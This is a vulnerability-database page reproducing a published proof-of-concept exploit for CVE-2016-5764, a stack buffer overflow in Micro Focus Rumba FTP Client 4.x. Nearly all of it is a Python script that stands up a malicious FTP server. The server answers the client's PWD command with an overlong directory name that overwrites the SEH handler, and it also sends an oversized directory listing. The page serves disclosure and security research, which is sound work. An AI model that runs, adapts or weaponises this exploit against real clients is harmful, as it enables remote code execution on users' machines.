Vulners
Lucene search
Micro Focus Rumba FTP Client 4.x Stack Overflow
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Rumba FTP Client 4.x - Stack buffer overflow (SEH) Exploit | 31 Oct 201600:00 | – | zdt |
 | Micro Focus Rumba FTP Stack Buffer Overflow Vulnerability | 4 Nov 201600:00 | – | cnvd |
 | CVE-2016-5764 | 27 Oct 201620:00 | – | cve |
 | CVE-2016-5764 | 27 Oct 201620:00 | – | cvelist |
 | Rumba FTP Client 4.x - Remote Stack Buffer Overflow (SEH) | 31 Oct 201600:00 | – | exploitdb |
 | EUVD-2016-6699 | 7 Oct 202500:30 | – | euvd |
 | Rumba FTP Client 4.x - Remote Stack Buffer Overflow (SEH) | 31 Oct 201600:00 | – | exploitpack |
 | CVE-2016-5764 | 27 Oct 201620:59 | – | nvd |
 | Buffer overflow | 27 Oct 201620:59 | – | prion |
`# Exploit Title: Rumba FTP Client 4.x stack overflow SEH
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28731.rumba-ftp-4-x-security-update.aspx
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40307
# Version: 4.x
# Tested on: Windows 7
# CVE : CVE-2016-5764
1. Description
Micro Focus Rumba FTP Client 4.x cannot handle long directory names. An attacker can setup a malicious FTP server that can send a long directory name which can led to remote code execution on the connected client.
2. Proof of Concept
The code below can be used to setup a malicious FTP server that will send a long directory name and overwrite the stack. The PoC only overwrites the SEH + NSEH.
# malicious-ftp-Server.py
import socket
import sys
import time
# IP Address
IP = '127.0.0.1' \
''
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
server_address = (IP,21)
print "Starting up on %s port %s" % server_address
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
# Wait for incoming connection
while True:
print "Waiting for a connection"
connection, client_address = sock.accept()
try:
print "Connection from " + str(client_address)
# Receive the data in small chunks and restransmit it
connection.send("220 Welcome\r\n")
while(True):
data = connection.recv(16)
print "received %s" % data
if "USER" in data:
print "Sending 331"
connection.send("331 Please specify the password.\r\n")
if "PASS" in data:
print "Sending 227"
connection.send("230 Login successful.\n\n")
if "PWD" in data:
print "Sending 257"
# 77A632E2 add esp,908 pop pop pop ret
# THIS IS THE PART WHERE THE OVERFLOW HAPPENS
connection.send("257 \"/"+"A"*629+"\x45\x45\x45\x45"+ "\x44\x44\x44\x44" + "D"*185 + "rrrr" + "D"*211 + "\"\r\n")
if "TYPE A" in data:
print "Sending 200 Switching to ASCII mode."
connection.send("200 Switching to ASCII mode.\r\n")
if "TYPE I" in data:
print "Sending 200 Switching to Binary mode."
connection.send("200 200 Switching to Binary mode.\r\n")
if "SYST" in data:
print "Sending 215"
connection.send("215 UNIX Type: L8\r\n")
if "SIZE" in data:
print "Sending 200"
connection.send("200 Switching to Binary mode. \r\n")
if "FEAT" in data:
print "Sending 211-Features"
connection.send("211-Features:\r\n EPRT\r\n EPSV\r\n MDTM\r\n PASV\r\n REST STREAM\r\n SIZE\r\n TVFS\r\n211 End\r\n")
if "CWD" in data:
print "Sending 250 Directory successfully changed."
connection.send("250 Directory successfully changed.\r\n")
if "PASV" in str(data):
print "Sending 227 Entering Passive Mode (130,161,45,252,111,183)\n\n"
connection.send("227 Entering Passive Mode (130,161,45,252,111,183)\n\n")
# Listen on new socket for connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'
#Bind socket to local host and port
try:
s.bind((IP, 28599))
except socket.error as msg:
print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print 'Socket bind complete for PASV on port 28599'
#Start listening on socket
s.listen(10)
print 'Socket now listening on 28599'
#now keep talking with the client
#wait to accept a connection - blocking call
conn, addr = s.accept()
print 'Connected with ' + addr[0] + ':' + str(addr[1])
time.sleep(1)
print "Sending dir list"
connection.send("150 Here comes the directory listing.\r\n")
conn.send("d"*500+"rwx------ 2 500 500 4096 Nov 05 2007 " + "A." + "B"*500 + "\r\n")
# Send ok to ftp client
connection.send("226 Directory send OK.\r\n")
# close the connection
s.close()
conn.close()
break
if "EXIT" in str(data):
print "REC"
connection.send("Have a nice day!\r\n")
break
finally:
connection.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Oct 2016 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.09232